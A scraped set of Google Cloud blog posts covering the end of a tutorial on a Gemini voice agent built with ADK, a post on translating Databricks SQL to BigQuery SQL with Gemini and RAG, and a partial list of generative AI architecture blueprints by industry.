code_block: <ListValue: [StructValue([(‘code’, ‘# In app/server/streaming_service.pyrnfrom google.adk.tools import GoogleSearch, MCPToolsetrnfrom google.adk.tools.mcp_tool.mcp_toolset import StdioServerParametersrnfrom core_utils import MODEL, SYSTEM_INSTRUCTIONrnimport osrnrnMaps_api_key = os.environ.get(“Maps_API_KEY”)rnself.agent = Agent(rn name=”voice_assistant_agent”,rn model=MODEL,rn instruction=SYSTEM_INSTRUCTION,rn tools=[rn GoogleSearch,rn MCPToolset(rn connection_params=StdioServerParameters(rn command=’npx’,rn args=[“-y”, “@modelcontextprotocol/server-google-maps”],rn env={“Maps_API_KEY”: Maps_api_key}rn ),rn )rn ],rn)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e3194385dc0>)])]>

A closer look at the tools

Google Search: This pre-built ADK tool lets your agent perform Google searches to answer questions about current events and real-time information.
MCP Toolset for Google Maps: This uses the Model Context Protocol (MCP) to connect your agent to a specialized server (in this case, one that understands the Google Maps API). The main agent acts as an orchestrator, delegating tasks it can’t handle to specialist tools.

Engineering a natural conversation

The RunConfig object defines how the agent communicates. It controls aspects like voice selection and streaming mode.

code_block: <ListValue: [StructValue([(‘code’, ‘# In app/server/streaming_service.py (inside the handle_stream method)rnfrom google.adk.agents.run_config import RunConfig, StreamingModernfrom google.genai import typesrnfrom core_utils import VOICE_NAMErnrnrun_config = RunConfig(rn streaming_mode=StreamingMode.BIDI,rn speech_config=types.SpeechConfig(rn voice_config=types.VoiceConfig(rn prebuilt_voice_config=types.PrebuiltVoiceConfig(rn voice_name=VOICE_NAMErn )rn )rn ),rn response_modalities=[“AUDIO”],rn output_audio_transcription=types.AudioTranscriptionConfig(),rn input_audio_transcription=types.AudioTranscriptionConfig(),rn)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e3194385970>)])]>

StreamingMode.BIDI (bi-directional) enables users to interrupt the agent, creating a more natural conversation.

The asynchronous core

Real-time voice chats require handling multiple tasks concurrently: listening, thinking, and speaking. Python’s asyncio and TaskGroup manage these parallel tasks.

code_block: <ListValue: [StructValue([(‘code’, ‘# In app/server/streaming_service.py (inside the handle_stream method)rnimport asynciornasync with asyncio.TaskGroup() as tg:rn # Task 1: Listens for audio from the user’s browser.rn tg.create_task(receive_client_messages(), name=”ClientMessageReceiver”)rn # Task 2: Forwards audio to the Gemini service.rn tg.create_task(send_audio_to_service(), name=”AudioSender”)rn # Task 3: Listens for responses from Gemini.rn tg.create_task(receive_service_responses(), name=”ServiceResponseReceiver”)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e31943857f0>)])]>

Translating the agent’s voice

The receive_service_responses task processes the agent’s output before sending it to the user. This output includes audio and text transcription.

Handling audio

Audio is handled using Base64 encoding to convert binary data into a text string for transmission.

code_block: <ListValue: [StructValue([(‘code’, ‘# — Inside receive_service_responses —rnimport base64rnimport jsonrn# Handling Audio Responsernif hasattr(part, “inline_data”) and part.inline_data:rn # Encode the raw audio bytes into a Base64 text string.rn b64_audio = base64.b64encode(part.inline_data.data).decode(“utf-8”)rn # Package it in a JSON message, typed as “audio”.rn await websocket.send(json.dumps({“type”: “audio”, “data”: b64_audio}))’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e3194385730>)])]>

Handling text

Text transcription is streamed for real-time feedback.

code_block: <ListValue: [StructValue([(‘code’, ‘# — Inside receive_service_responses —rn# Handling Text Responsernif hasattr(part, “text”) and part.text:rn # Check if the text is a partial thought.rn event_str = str(event)rn # Check if the text is a streaming, partial thought.rn if “partial=True” in event_str:rn # Send it for real-time display on the client.rn await websocket.send(json.dumps({“type”: “text”, “data”: part.text}))’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e3194385e20>)])]>

Get started

Read More for the details.

2025 08 21

GCP – Intelligent code conversion: Databricks Spark SQL to BigQuery SQL via Gemini

Tibor Kiss Cloud, Google Cloud gcp

As data platforms evolve and businesses diversify their cloud ecosystems, the need to migrate SQL workloads between engines is becoming increasingly common. Recently, I had the opportunity to work on translating a set of Databricks SQL queries to BigQuery SQL — a task that is deceptively complex due to differences in syntax, functions, and execution behavior.

To streamline the process, we turned to Google Gemini, a powerful AI assistant, to help bridge the gap between the two SQL dialects. In this blog post, I’ll walk you through the process, challenges we faced, how Gemini helped, and key takeaways from the experience.

The translation tightrope: Why it’s tricky

To boost operational efficiency and cut costs, we migrate analytics workloads from Databricks SQL (on Delta Lake tables) to Google BigQuery. This required rewriting numerous queries, from simple aggregations to intricate CTEs and window functions.

Databricks, with its powerful Spark SQL capabilities, and BigQuery, a serverless and highly scalable data warehouse, are both titans in the data world. However, their SQL dialects, while sharing common ANSI SQL foundations, have distinct variations. Translating between the two manually was possible, but would have been time-consuming and error-prone. This is where Google Gemini played a crucial role.

Below are some of the data type mappings between Databricks and Bigquery :

Category	Databricks SQL Data Type	BigQuery SQL Data Type	Description
Integer Types	TINYINT	INT64	8-bit integer
	SMALLINT	INT64	16-bit integer
	INT or INTEGER	INT64	32-bit integer
	BIGINT	INT64	64-bit integer
Floating-Point Types	FLOAT or REAL	FLOAT64	64-bit floating point
	DOUBLE	FLOAT64	64-bit floating point (equivalent to BigQuery’s FLOAT64)
Decimal/Exact Types	DECIMAL or NUMERIC	NUMERIC or BIGNUMERIC	Fixed-point decimal with user-defined precision and scale. BigQuery has an extended BIGNUMERIC for larger precision.
Boolean Types	BOOLEAN	BOOL	True or False
String Types	STRING or VARCHAR	STRING	Variable-length string
	CHAR	Not Supported	Fixed-length string is not directly supported in BigQuery; use STRING instead.
Date and Time Types	DATE	DATE	Calendar date (year, month, day)
	TIMESTAMP	TIMESTAMP	Timestamp with time zone information
	DATETIME	DATETIME	Timestamp without time zone

Syntax difference in Databricks and BigQuery

First_Value :

Databricks

code_block: <ListValue: [StructValue([(‘code’, ‘first_value(expr[, ignoreNull]) [FILTER ( WHERE cond ) ]’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e3191b802e0>)])]>

BigQuery

code_block: <ListValue: [StructValue([(‘code’, ‘FIRST_VALUE (value_expression [{RESPECT | IGNORE} NULLS])rnOVER over_clausernrnover_clause:rn { named_window | ( [ window_specification ] ) }rnrnwindow_specification:rn [ named_window ]rn [ PARTITION BY partition_expression [, …] ]rn ORDER BY expression [ { ASC | DESC } ] [, …]rn [ window_frame_clause ]’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e3191b80c40>)])]>

In particular, working with H3 geospatial functions can often present unique translation hurdles. Our resources provide clear mappings, like these:

Databricks Function	BigQuery Equivalent Function	Description
h3_boundaryasgeojson (h3CellIdExpr)	ST_ASGEOJSON(jslibs.h3.ST_H3_ BOUNDARY(h3CellIdExpr))	Returns the polygonal boundary of the input H3 cell in GeoJSON format.
h3_boundaryaswkb (h3CellIdExpr)	ST_ASBINARY(jslibs.h3.ST_H3_ BOUNDARY(h3CellIdExpr))	Returns the polygonal boundary of the input H3 cell in WKB format.
h3_boundaryaswkt (h3CellIdExpr)	ST_ASTEXT(jslibs.h3.ST_H3_ BOUNDARY(h3CellIdExpr))	Returns the polygonal boundary of the input H3 cell in WKT format.

Providing precise details for complex functions like these is crucial. In fact, we’ve found that by detailing these H3 translations, even advanced AI models like Gemini can generate more accurate and reliable BigQuery SQL from your original Databricks Spark SQL, ensuring your geospatial analyses remain intact.

Architecture overview

Before diving into the translation logic, let me show you how the pieces fit together.

Pipeline components

Source SQL Storage:

All original Databricks SQL files were stored in Google Cloud Storage .

Function mapping guide:

A curated guide that maps Databricks-specific SQL functions (e.g., First_value, UCase,etc) to their BigQuery equivalents (FIRST_VALUE, UPPER, TIMESTAMP etc.)
This guide included examples and syntax rules, which were used as input context for Gemini.

Few-shot examples:

I selected a set of hand-translated queries to serve as high-quality training prompts to improve Gemini’s consistency.

Retrieval-Augmented Generation (RAG) layer:

Before querying Gemini, I leveraged the Vertex AI RAG Engine to retrieve relevant function mappings and example translations. This ensured Gemini had grounded knowledge, improving the accuracy of the output. The RAG-enriched prompt was then sent to Gemini for translation, and the returned SQL was optionally post-processed to fix edge cases.

This ensured Gemini had grounded knowledge, improving the accuracy of the output.

Gemini API integration:

The RAG-enriched prompt was sent to Gemini for translation.
Returned SQL was optionally post-processed to fix edge cases.

Validation layer:

Translated SQL queries were validated by executing them in a BigQuery dry run mode to detect syntax issues.

Architecture diagram

Lessons learned

RAG + Gemini = Smart SQL translation: Grounding Gemini with real-world examples and mapping logic made it significantly more accurate.

A comprehensive function mapping guide is essential: Invest time in building a robust function mapping resource.

Thorough validation is the key: Use BigQuery’s dry run and information schema to ensure translated queries are safe and optimized.

Ready to streamline your SQL migrations?

Stop wrestling with SQL syntax and start leveraging the power of your data, wherever it resides. With the Gemini model, we can streamline your Databricks Spark SQL to BigQuery SQL translation process, making it faster, more reliable, and far less painful.

Dive in and accelerate your journey to cross-platform data success. Click on this link to get more details, and take it forward!

Read More for the details.

2025 08 21

GCP – 101+ gen AI use cases with technical blueprints

Tibor Kiss Cloud, Google Cloud gcp

A little over a year ago, we published a list of generative AI use cases that has since grown to include more than 600 examples of how organizations are putting AI to work. Yet for many developers and business leaders, inspiration has given way to a more practical question: where do I start?

To help, we’ve created a technical complement to our most impactful, customer-inspired use cases. This guide contains 101 architectural blueprints as illustrative starting points to give you a practical foundation for your next project.

Each blueprint shows a design pattern and a corresponding Google Cloud tech stack to solve real-world challenges, from automating document summarization and forecasting sales, to improving patient outcomes and preventing fraud.

Let’s dive in.

The list is organized by 10 major industry groups.

These architectural blueprints are inspired by customers who are using AI in the retail industry such as Mercari, Target, Carrefour Taiwan, The Home Depot, Unilever, and more.

1. Unify online and in-store retail experiences

Business challenge: You’re a large retailer with valuable physical stores and a growing e-commerce channel. These two worlds operate in silos, creating a disconnected experience where customers face inconsistent pricing, promotions, and inventory levels.
Tech stack: Google Kubernetes Engine (GKE), BigQuery, Cloud CDN, Apigee, Cloud Spanner.
Blueprint: Customer traffic hits your e-commerce site -> Cloud CDN caches static content for speed -> GKE scales containerized e-commerce microservices based on demand -> Apigee manages APIs for real-time inventory checks against store-level data -> All sales data streams into BigQuery for supply chain analytics and demand forecasting

2. Give your store managers ways to see real-time inventory

Business challenge: You want to boost efficiency by giving your store managers accurate, real-time inventory recommendations.
Tech stack: BigQuery, Vertex AI, Looker, Google Workspace.
Blueprint: Daily sales and inventory data from thousands of stores is ingested into BigQuery -> Vertex AI models process historical data to predict demand for each item -> Looker generates dashboards with recommended stock levels -> Recommendations are pushed to store associates’ devices, often via a simple interface like Google Sheets.

3. Make it easy for users to find and discover unique items on your online site

Business challenge: You have millions of unique, non-standard items needed to provide a highly relevant, fast, and personalized search experience for its users.
Tech stack: Google Cloud Storage, Dataflow, BigQuery, GKE.
Blueprint: A seller lists a new item, and its data is stored in Cloud Storage -> Dataflow processes item details and user interaction data in real-time -> This data enriches search indexes and feeds machine learning models running on GKE -> When a user searches, the models provide personalized rankings, which are served in milliseconds.

4. Modernize in-store operations with AI

Business challenge: You’re a retailer who needs to digitize and streamline legacy, paper-based processes for store associates to improve productivity and customer service.
Tech stack: Vertex AI Vision, GKE, Android, ChromeOS.
Blueprint: An associate uses a mobile device to scan a product shelf -> Vertex AI Vision analyzes the image to identify products and price tags -> An application, running on GKE, cross-references this with inventory data -> The device displays inventory status, ordering needs, or planogram compliance information.

5. Create an assistant for a better shopping experience

Business challenge: You’re a brand whose traditional support channels, like text-based chatbots and FAQs, feel impersonal, can’t visually guide customers through complex processes, and might not create a genuine connection with your audience.
Tech stack: Vertex AI, Google Cloud Storage (for 3D assets), GKE (for hosting and scaling), Speech-to-Text & Text-to-Speech APIs
Blueprint: A customer asks a troubleshooting question in your app (e.g., “How do I replace the water filter in my coffee machine?”). ➝ The request (voice or text) is sent to the conversational AI “brain” on Vertex AI, which identifies the intent. ➝ The AI generates a text response and identifies the corresponding visual aid (e.g., filter_replacement_step1.mp4). ➝ A service on GKE retrieves this video clip from Google Cloud Storage. ➝ The app displays the text and plays the short video, visually guiding the customer through the process and resolving their issue quickly.

6. Write differentiated product descriptions

Business challenge: You’re a large e-commerce retailer that needs to create unique, high-quality, and SEO-friendly product descriptions for thousands of items at scale, reducing manual effort and avoiding duplicate content.
Tech stack: Vertex AI, Cloud Run, BigQuery.
Blueprint: A merchandiser inputs key product attributes (e.g., material, color, target audience) into a product management tool -> These attributes are sent to a service on Cloud Run -> The service constructs a detailed prompt and calls the Vertex AI Generative AI API -> Vertex AI analyzes the attributes and returns multiple unique description options -> The descriptions are displayed to the merchandiser for review, editing, and final approval.

7. Help users find your products using photos as a reference

Business challenge: You want to make it easy for your customers to find desired inventory (e.g. clothing) using a photo as a reference.
Tech stack: Vertex AI Vision, Vector Search, Google Cloud Storage, Cloud Run.
Blueprint: A customer uploads a reference photo in the app -> The app sends the photo to a service on Cloud Run -> The service uses Vertex AI Vision to convert the photo into a vector embedding -> This embedding is used to query the Vector Search , which finds the most visually similar product embeddings from the indexed catalog -> The service returns the matching products to the customer in seconds.

8. Build a real-time product recommendation engine

Business challenge: You’re a digital retailer trying to increase basket size and customer loyalty. Traditional recommendation engines are too simplistic, often failing to understand a customer’s true intent or style beyond basic keywords. This leads to generic suggestions, poor discoverability for unique items in your catalog, and frustrated shoppers who abandon their carts, causing you to leave significant revenue on the table.
Tech stack: BigQuery, Vector Search, Dataflow, Cloud Run.
Blueprint: User clickstream data streams into Dataflow -> Dataflow processes and enriches these events, updating user profiles and embeddings in real-time (in BigQuery or a feature store) -> As a user browses, a request is sent to a service on Cloud Run -> The service queries Vector Search with the user’s embedding to find the most relevant or complementary items -> A personalized list of products is returned and displayed to the user in milliseconds.

9. Quickly identify trends and improve customer interactions

Business challenge: Your valuable feedback is buried in thousands of rows of unstructured text from surveys, reviews, and support tickets. Manually reading, tagging, and categorizing this data is a slow and tedious process that delays critical insights and prevents your team from quickly reacting to emerging trends or urgent issue
Tech stack: Google Sheets, Gemini for Google Workspace, Google Forms (as a data source).
Blueprint: Customer feedback is collected from sources like Google Forms and consolidated into a Google Sheet -> An analyst highlights the column of raw feedback and uses the integrated Gemini feature with a prompt like “Categorize this feedback” -> Gemini processes the text in each cell and populates a new column with the corresponding categories -> The analyst can then create charts and pivot tables on this newly structured data to identify trends.

10. Compare vendor proposals, right from your email

Business challenge: You’re a buyer or department head responsible for making purchasing decisions. But complex vendor proposals arrive in different formats, burying key details like costs, timelines, and deliverables across dozens of pages. Manually creating a comparison is slow, tedious, and prone to human error, creating the risk that you’ll miss a critical detail and make a costly decision.
Tech stack: Gmail, Gemini for Google Workspace.
Blueprint: A buyer receives multiple emails with vendor proposals as attachments (PDFs, Docs, etc.) -> In the Gmail thread, the user activates Gemini and provides a prompt like, “Create a table comparing the cost, timeline, and key deliverables from the attached proposals” -> Gemini reads the context of the emails and the content of the attachments -> It generates a concise summary and a comparison table directly in the Gmail interface -> The buyer can then make a faster, more informed decision without manually cross-referencing documents.

11. Merge and duplicate product listings

Business challenge: You’re an e-commerce catalog manager responsible for a massive product catalog sourced from multiple vendors. Inconsistent data creates countless duplicate listings for the same item. This clutters the customer experience, splits your inventory and sales data (making accurate forecasting impossible) and harms your search rankings, all while your team spends countless hours manually trying to find and merge them.
Tech stack: BigQuery, Vertex AI, Dataflow
Blueprint: Product catalog data is processed by a data processing pipeline (Dataflow)-> Dataflow calls a Vertex AI model to convert product text and images into vector embeddings -> The embeddings are stored in BigQuery -> A BigQuery ML clustering model groups items with similar embeddings into duplicate sets -> These duplicate sets are sent to a review dashboard or an automated merging service.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e54002643d0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

101+GenAI_Blog_Header_002-Media-Marketing-Gaming

These architectural blueprints are inspired by customers who are using AI in the media, marketing, and gaming industry, such as: Formula E, The Golden State Warriors, Spotify, Warner Bros Discovery, and more.

12. Summarize commentary into podcasts

Business challenge: You’re a broadcaster or sports league with hours of live commentary for each event. Manually creating highlight reels, summaries, or daily podcasts is time-consuming, labor-intensive, and slow, causing you to miss opportunities for timely fan engagement.
Tech stack: Google Cloud Speech-to-Text, Vertex AI, Cloud Functions, and Google Cloud Storage.
Blueprint: Live audio commentary is captured and stored in Google Cloud Storage ➝ A Cloud Function is triggered, which sends the audio file to the Speech-to-Text API to generate a full, time-stamped transcript ➝ The transcript is sent to a Vertex AI generative model with a prompt like, “Identify the top 5 most exciting moments from this race transcript based on exclamation, keywords (e.g., ‘overtake’, ‘crash’), and sentiment. For each moment, create a 30-second summary script” ➝ The generated podcast script is then sent to a text-to-speech engine or a human host to be recorded, creating a “daily highlights” podcast in minutes instead of hours.

13. Build a content recommendation engine

Business challenge: You’re a sports franchise or media company that has consolidated all of its fan data into a unified data foundation. You want to deliver relevant, personalized content to every fan—including real-time game highlights, scores, and alerts about ticket sales or events—to deepen engagement and increase revenue.
Tech stack: BigQuery, Vertex AI Search, Vector Search, Dataflow, and Cloud Run.
Blueprint: Real-time fan interactions and game data (scores, stats) stream into Pub/Sub ➝ A Dataflow pipeline processes and enriches this data, updating fan profiles in the BigQuery unified data foundation ➝ Vertex AI uses this historical and real-time data to train a recommendation model ➝ When a fan uses the team’s app, a request is sent to a service on Cloud Run ➝ The service queries Vertex AI Vertex AI Search with the fan’s ID, which returns a personalized list of content (highlights, articles, ticket alerts) ➝ The app displays the personalized recommendations to the fan in real time.

14. Create ultra-personalized media campaigns

Business challenge: You want to move beyond generic marketing and create deeply personal, shareable moments for every single user.
Tech stack: BigQuery, Vertex AI, Dataflow, Cloud Run, and Google Cloud Storage.
Blueprint: A large-scale Dataflow pipeline processes a year’s worth of user interaction data from BigQuery to calculate personalized stats for each user ➝ For each user, a service on Cloud Run sends their top stats (e.g., favorite artist, most-played song) to the Gemini API with a prompt like, “Generate a fun, upbeat script for a podcast summarizing these listening habits” ➝ The Cloud Run service uses the generated text to create personalized assets (audio clips, social media images) and stores them in Google Cloud Storage ➝ When the user opens their app, it fetches their unique, pre-generated assets from Cloud Storage to deliver their personalized experience.

15. Build an AI captioning tool

Business challenge: You’re a major media company with a massive archive of video content. Your challenge is making this content accessible and searchable by creating accurate, time-stamped captions and transcripts, a process that is incredibly slow and expensive to do manually.
Tech stack: Google Cloud Storage, Speech-to-Text API, Vertex AI, Cloud Functions.
Blueprint: A video file is uploaded to Google Cloud Storage. ➝ A Cloud Function triggers and sends the video’s audio track to the Speech-to-Text API, specifying a model trained for media content. ➝ The API returns a detailed, time-stamped transcript. ➝ For added context, the transcript can be sent to a Gemini model with a prompt like, “Identify the different speakers in this transcript and label their lines,” providing a rich, searchable, and accessible caption file.

16. Write social media captions

Business challenge: You’re a sports league or broadcaster with hours of event footage. Your challenge is quickly creating engaging social media clips to capitalize on exciting moments, a process that requires a social media manager to manually watch footage, select a clip, and write a caption.
Tech stack: Gemini for Google Drive, Google Drive.
Blueprint: All broadcast footage from an event is saved to a shared folder in Google Drive. ➝ A social media manager opens the Gemini in Drive side panel. ➝ They use a prompt like, “Analyze the video files in this folder from the last hour. Find the top 3 most exciting moments based on commentary and crowd noise. For each, suggest a 5-second video clip and write three different engaging social media captions with relevant hashtags.” ➝ Gemini provides the clips and captions directly in the Drive interface, turning an hours-long task into a single prompt.

17. Create hundreds of hyper-personalized video and audio ad variations in minutes

Business challenge: You’re a digital advertising platform, and your clients want to move beyond one-size-fits-all ads. Your challenge is creating hundreds of personalized ad variations tailored to different audiences, a task that is prohibitively expensive and slow using traditional production methods.
Tech stack: Vertex AI, Text-to-Speech API, Cloud Run, BigQuery.
Blueprint: An advertiser defines a campaign with multiple target audience segments stored in BigQuery (e.g., “young professionals,” “college students”). ➝ For each segment, a service on Cloud Run calls the Gemini API with a prompt like, “Generate a 15-second audio ad script for a new coffee brand, targeting ‘young professionals’. The tone should be sophisticated and energetic.” ➝ Gemini generates a unique script for each audience. ➝ The scripts are sent to the Text-to-Speech API to create audio voiceovers in various styles. ➝ These audio files are combined with background music, creating hundreds of personalized ad variations in minutes.

18. Gen AI photo-editing and design

Business challenge: You’re a franchise business and you need to create high-quality, professional marketing materials for hundreds of local branches. Your challenge is that local owners are not graphic designers, and hiring designers for every local ad is not scalable.
Tech stack: Vertex AI, Google Cloud Storage, a custom marketing portal (built on App Engine or Cloud Run).
Blueprint: A local studio owner logs into a central marketing portal. ➝ They upload a photo of their students to Google Cloud Storage. ➝ The portal provides an editing interface powered by Imagen 3, Google’s image generation model. ➝ The owner can use simple prompts like, “Extend the background of this photo to fit a vertical social media post,” or “Create a dynamic ‘new student special’ graphic using this photo.” ➝ The AI generates professional-quality, on-brand marketing assets, empowering local franchises to create their own materials without design expertise

19. Search data across tens of thousands of courses

Business challenge: You’re a large media or education company with tens of thousands of courses, articles, and learning materials. Your challenge is helping users find the specific information they need when it’s buried across this massive and diverse content library.
Tech stack: Vertex AI Search, BigQuery, Google Cloud Storage.
Blueprint: All course content, including text, videos, and metadata, is indexed from sources like Google Cloud Storage and BigQuery into Vertex AI Search. ➝ A user goes to the learning platform and uses a natural language search query like, “I want to learn about the basics of financial modeling in spreadsheets, but I only have 30 minutes.” ➝ Vertex AI Search understands the multiple intents (topic, format, duration) and queries across the entire catalog. ➝ It returns a ranked list of the most relevant results, such as a specific 10-minute video lecture and a 20-minute practical exercise, providing a much more relevant result than a simple keyword search.

20. Make video content generation faster

Business challenge: You’re a company creating AI-powered video content, such as digital avatars or automated news reports. Your challenge is the immense computational power required to render high-quality video quickly, which can create a bottleneck and slow down your entire production pipeline.
Tech stack: Cloud GPUs (or TPUs), Google Kubernetes Engine (GKE), Google Cloud Storage.
Blueprint: A user submits a script and selects a digital avatar for a new video. ➝ The request is sent to a rendering application running on a GKE cluster. ➝ GKE automatically scales up a pool of nodes equipped with powerful Cloud GPUs. ➝ The GPUs work in parallel to process the AI models and render the video frames at high speed. ➝ Once rendering is complete, the final video file is saved to Google Cloud Storage, and the GPU-powered nodes scale down automatically, optimizing for both speed and cost.

21. Create a recommendations experience

Business challenge: You’re a major broadcaster with a huge catalog of content, from live sports to soap operas. Your challenge is to keep viewers engaged by surfacing content that is personally relevant to them from across your entire diverse portfolio, rather than just showing them what’s popular.
Tech stack: BigQuery, Vertex AI, Dataflow, Cloud Run.
Blueprint: Real-time viewer interaction data streams into a Dataflow pipeline, which processes the events and updates viewer profiles in BigQuery. ➝ The unified viewer data in BigQuery is used to train a Vertex AI Vertex AI Search model. ➝ When a viewer opens the streaming app, a request is sent to a service on Cloud Run. ➝ The service queries the Vertex AI Search model with the viewer’s ID. ➝ The model returns a personalized list of content, such as “Because you watched the soccer match, you might also like this sports documentary,” creating a highly engaging and personalized experience.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud data analytics’), (‘body’, <wagtail.rich_text.RichText object at 0x3e5408962100>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

101+GenAI_Blog_Header_003-Automotive-&-Logistics

These architectural blueprints are inspired by customers who are using AI in the automotive and logistics industry, such as: Volkswagen of America, PODS, Uber, UPS, BMW Group, and more.

22. Build an AI-powered interactive owner’s manual

Business challenge: You’re an automaker or manufacturer of complex products. Your challenge is that traditional paper owner’s manuals are cumbersome, difficult to search, and rarely used by customers, leading to frustration and increased calls to support centers for simple questions.
Tech stack: Vertex AI, AlloyDB for PostgreSQL, Cloud Run, Google Cloud Storage
Blueprint: All owner’s manual content is processed and chunked into vector embeddings, which are stored in AlloyDB. ➝ When a driver uses the app to ask a question like, “How do I change a flat tire?” , and the query is sent to a service on Cloud Run. ➝ For multimodal queries, the user points their phone’s camera at a dashboard light; the image is sent to Vertex AI Vision to identify it, and this information is added to the query. ➝ The service finds the most relevant manual sections from AlloyDB and sends them, along with the user’s question, to Gemini, which generates a clear, conversational answer.

23. Monitor real-time audio for in-transit safety alerts

Business challenge: You’re a transportation or logistics company responsible for the safety of thousands of drivers and passengers every day. Your challenge is reacting to dangerous situations quickly enough, as traditional methods rely on passengers or drivers manually triggering an alarm, which is often too late.
Tech stack: Speech-to-Text API, Vertex AI, Pub/Sub, Cloud Functions
Blueprint: During a trip, audio from the vehicle is streamed in chunks to Pub/Sub. ➝ A Cloud Function is triggered, which sends the audio snippet to the Speech-to-Text API for transcription. ➝ The resulting text is sent to a Gemini model with a prompt like, “Analyze this text for keywords related to distress or hostility (‘robbery’, ‘help’). Return a ‘Red’ alert if found, otherwise ‘Green’.” ➝ If a ‘Red’ alert is returned, the system automatically notifies a central security dashboard with the trip details and vehicle location.

24. Deploy dynamic, location-aware digital advertising

Business challenge: Your company has a large mobile physical presence (like a fleet of trucks) and you want to move beyond displaying static logos. Your challenge is creating advertising that is hyper-relevant and context-aware, to capture the attention of people in specific neighborhoods with unique messaging.
Tech stack: Gemini, Google Maps Platform (Geocoding API), Cloud Run, BigQuery
Blueprint: A device on a truck periodically sends its GPS coordinates to a service on Cloud Run. ➝ The service calls the Google Maps Geocoding API to identify the current neighborhood and queries BigQuery for demographic or local interest data associated with that area. ➝ These details are used to construct a prompt for Gemini, such as “Create a witty, 10-word billboard headline for a moving company in a neighborhood known for its young families and parks.” ➝ Gemini returns multiple headline options, and the service displays the best one on the truck’s digital billboard in real time.

25. Build a productivity agent for customer service teams

Business challenge: You’re a large enterprise with a customer service team that handles thousands of interactions daily. Your agents spend significant time writing summaries instead of focusing on high-quality problem-solving.
Tech stack: Vertex AI, BigQuery, Cloud Functions
Blueprint: All customer service interactions (chats, emails) are stored in a central data store like BigQuery. ➝ When an agent opens a new ticket, a Cloud Function is triggered. ➝ The function retrieves the customer’s entire interaction history from BigQuery and sends it to Gemini with a prompt like, “Summarize the key issues from this customer’s past 5 interactions and list their current sentiment.” ➝ The concise summary appears directly in the agent’s CRM, allowing them to understand the full context in seconds and provide a more effective and empathetic response.

26. Analyze large-scale telematics data for fleet optimization

Business challenge: You’re a global logistics or telematics company managing millions of connected vehicles. Your challenge is processing the immense volume of daily data points that can help you improve fleet efficiency, driver safety, and sustainability.
Tech stack: BigQuery, Vertex AI, Looker
Blueprint: Billions of data points from millions of vehicles stream directly into BigQuery daily. ➝ BigQuery ML uses that data to train models directly within the data warehouse to identify patterns related to fuel consumption, unsafe driving habits, or optimal routing. ➝ The models run continuously, analyzing new data as it arrives and outputting insights such as “vehicles on Route 88 are experiencing 15% higher fuel consumption due to traffic patterns.” ➝ These insights are visualized in a Looker dashboard, allowing fleet managers to make informed decisions on routing, driver training, and vehicle maintenance.

27. Create an AI-powered supply chain risk intelligence platform

Business challenge: You’re a global enterprise with a complex, multi-tiered supply chain. Your challenge is a lack of visibility into potential disruptions — from financial instability and labor issues to geopolitical events — deep within your supplier network, putting you at risk of costly delays and compliance failures.
Tech stack: Gemini, , Pub/Sub, BigQuery
Blueprint: The system continuously ingests data from public sources (news, social media, financial reports) via Pub/Sub. ➝ This data, along with a company’s internal supplier data, is stored and processed in BigQuery. ➝ Gemini models analyze the unstructured text data, performing sentiment analysis and entity recognition to identify potential risks associated with specific suppliers (e.g., “news reports indicate labor strikes at Factory X”). ➝ The system generates a risk score for each supplier, which is updated in real-time on a dashboard, alerting managers to potential disruptions before they impact the supply chain.

28. Build a digital twin of your distribution network

Business challenge: You’re a logistics and shipping company operating a vast, complex network of vehicles, warehouses, and sorting facilities. Your challenge is a lack of a single, real-time view of your entire operation, making it difficult to optimize routes, predict delays, and provide customers with accurate tracking information.
Tech stack: Pub/Sub, Dataflow, BigQuery, Vertex AI, Google Maps Platform
Blueprint: IoT sensors on packages, vehicles, and in facilities stream real-time location and status data to Pub/Sub. ➝ A Dataflow pipeline processes this massive stream of data, cleansing and structuring it before loading it into BigQuery. ➝ Vertex AI models use this historical and real-time data to run thousands of simulations, predicting potential bottlenecks and optimizing routes. ➝ The entire network state is visualized on a Google Maps Platform interface, creating a “digital twin” that allows operators to see the entire network at a glance and customers to track their packages with pinpoint accuracy.

29. Optimize industrial planning with 3D digital twins

Business challenge: You’re a manufacturer with complex factory layouts and supply chains. Your challenge is that optimizing facility design, production line flow, or warehouse logistics is incredibly difficult and expensive to test in the physical world.
Tech stack: Vertex AI, a 3D modeling engine, Google Cloud Storage
Blueprint: Factory assets are scanned using mobile devices or drones, capturing thousands of images. ➝ The images are uploaded to Google Cloud Storage and processed by Vertex AI Vision models to identify objects and their dimensions. ➝ This structured data is fed into a 3D modeling engine to create a photorealistic digital twin of the facility. ➝ Planners can then use this digital twin to run thousands of simulations with Gemini, asking questions like “What is the most efficient path for a robot to move from station A to station B?” to optimize processes virtually before committing to expensive physical changes.

30. Bring your employees up to speed on AI

Business challenge: You’re a manufacturing company with a wealth of operational knowledge about the factory floor, but your expert workers lack the coding skills to build AI solutions. Your challenge is finding a way to make it easy to give your frontline teams ways to solve their own problems with AI, so they can improve efficiency and quality control.
Tech stack: Vertex AI, BigQuery, a simplified user interface (e.g., built on App Engine)
Blueprint: Factory sensor and quality control data is collected and stored in BigQuery. ➝ A simple, no-code user interface is created where a factory worker can select a dataset and define a goal, such as “Predict which parts are likely to have a defect based on these sensor readings.” ➝ The interface calls the Vertex AI AutoML API, which automatically trains, tests, and deploys a custom machine learning model without the worker writing any code. ➝ The deployed model can then be used in real-time on the production line to flag potential issues, directly improving efficiency.

31. Build an AI-powered sales assistant for e-commerce

Business challenge: You’re a retailer with a sophisticated online storefront. Your challenge is that customers often have nuanced questions or need guidance that a simple search bar or FAQ can’t provide, leading to abandoned carts and missed sales opportunities.
Tech stack: Vertex AI, BigQuery, Cloud Run
